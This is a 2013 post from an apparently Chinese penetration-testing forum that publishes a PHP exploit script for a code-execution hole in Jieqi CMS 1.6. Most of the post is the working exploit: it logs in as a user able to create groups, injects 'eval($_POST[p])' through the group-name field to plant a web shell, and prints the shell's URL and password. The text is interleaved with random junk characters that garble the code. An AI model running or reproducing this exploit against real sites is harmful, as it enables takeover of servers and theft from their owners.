中国网络渗透测试联盟

标题: Jieqi(杰奇)CMS V1.6 PHP代码执行0day漏洞EXP [打印本页]
作者: admin    时间: 2013-2-23 11:28
标题: Jieqi(杰奇)CMS V1.6 PHP代码执行0day漏洞EXP
杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。
7 S; Q" z3 D. S
: Y% l% V- @- j/ x) u8 P  f
' |; a+ k8 v  ?4 [2 @: ?该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。! }) G5 W3 N, H3 K
需要有一个能创建圈子的用户。% M! s4 m1 U. m6 F( L7 P+ Q

1 N. p: n# z% X" ]9 T% D* @8 N1 ~* L<?php6 R+ c5 e- z9 N: {+ W" i0 ?# W/ h. o

5 e; a  ]! A/ t3 Y; B$ O) Eprint_r('- J' S6 L. [8 h
+---------------------------------------------------------------------------+
  V! b# w( a+ K$ S. k; zJieqi CMS V1.6 PHP Code Injection Exploit* E1 p4 s9 i- f* f4 H7 V1 C/ l
by flyh4t
. V- c! J) {) h% Y/ F; U: fmail: phpsec at hotmail dot com
  h: j/ {( A3 v& q2 Fteam: http://www.wolvez.org
* {( D6 z1 `4 p8 p$ g' {+---------------------------------------------------------------------------+7 U( H: J2 Z  g7 T( _$ B
'); /**
+ @% \9 s1 k9 ]: c * works regardless of php.ini settings
  A/ i7 b" @: _0 d# D*/ if ($argc < 5) { print_r(': B" A" G8 L4 H) b) M. g$ d
+---------------------------------------------------------------------------+
8 p5 U# h4 P) [* jUsage: php '.$argv[0].' host path username* X$ @6 J9 w4 J) l; y/ R0 a% W
host:      target server (ip/hostname)
, {' C6 ?2 Q% u& d! s- A+ |path:      path to jieqicms
  R8 N  y% Z% O1 kuasename:  a username who can create group
3 l' O1 u( q$ m  YExample:+ {" ]8 I( i- _- {6 F
php '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password8 h/ M3 Q# n) v. {; y! \7 D7 _
+---------------------------------------------------------------------------+
3 N: ~3 k( ~/ a' M6 X0 K9 G'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /*get shell*/ $params ='-----------------------------23281168279961
+ @+ z! a6 w( a7 H3 Z0 d/ h5 xContent-Disposition: form-data; name="gname"
9 R$ b$ h3 S+ I0 o0 ^
1 z* T  {5 h9 |'; $params .="';"; $params .='eval($_POST[p]);//flyh4t  M% f  n9 u+ N* g
-----------------------------23281168279961' {0 j& p0 F/ z# J) M) R7 H+ i
Content-Disposition: form-data; name="gcatid"; F+ ?: P  J3 g

( ~) m( u4 a0 p16 y" ^7 m6 d" U
-----------------------------23281168279961
: ?. B  X9 W6 n5 h6 y3 [+ _: WContent-Disposition: form-data; name="gaudit"
7 _; Q0 t0 e7 m: ~ 6 e! ?/ u  |: B! e- G
1
6 b5 C/ c: L; k& C. s/ s-----------------------------23281168279961
$ ^( H% y4 x3 h% T' a; YContent-Disposition: form-data; name="gbrief", X8 j$ N- ^* d( {, `. e

  [- R& D3 M9 j5 S2 u- B2 s! O. `1/ W# d' a9 Y2 g0 A, I/ ~
-----------------------------23281168279961--
- {0 n/ e! l. K2 k3 i'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs就是返回的内容 ob_clean(); www.2cto.com- L, L- q# n& Y/ E

; h6 ?' O5 l' K& _preg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url;



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2